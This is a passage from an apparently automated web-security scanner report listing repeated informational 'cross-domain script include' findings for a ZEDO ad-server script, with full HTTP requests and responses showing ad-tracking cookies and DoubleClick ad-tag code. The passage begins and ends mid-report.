Content-Length: 2109

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.32;sz=160x600;click=http://yads.zedo.com/ads2/c?a=929080%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=13%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=13%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.73. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.02735296992088576 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=43:47:43:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=44:43:47:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=116
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:49:58 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=44%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=44%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.74. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.051862519411162766 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=48:53:48:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=49:48:53:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=105
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:09 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=49%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=49%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.75. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.7809348179682917 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=15:16:14:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:12 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=16:16:14:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=129
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:48:13 GMT
Connection: close
Content-Length: 2093

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.30;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929081%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=16%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=16%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.76. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.4695879082935963 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=40:44:41:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=42:40:44:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=32
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:49 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=42%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=42%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.77. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.20291066933388213 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=7:6:8:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175|2,1,1:1,1,1:1,1,1:0,1,1:1,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175|2,1,1:1,1,1:1,1,1:0,1,1:2,1,1:2,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:22 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=9:7:6:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=179
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:23 GMT
Connection: close
Content-Length: 2136

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.10;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911254%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=9%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=9%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.78. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.6496371365591397 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=33:33:33:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=34:33:33:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:16 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=34%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=34%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.79. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.483123755400549 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=29:27:28:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:51 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=29:29:27:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=90
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:51 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
O0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5286815.2;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=907527%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=29%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=29%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.80. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8892930572569906 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=60:51:51:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=52:60:51:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=67
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:47 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=52%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=52%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.81. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.7530534581965833 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=18:20:18:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1;expires=Tue, 24 May 2011 16:48:23 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=19:20:18:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=118
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:23 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=19%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=19%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

24.82. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.34548330139241534 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=23:25:24:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:4,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
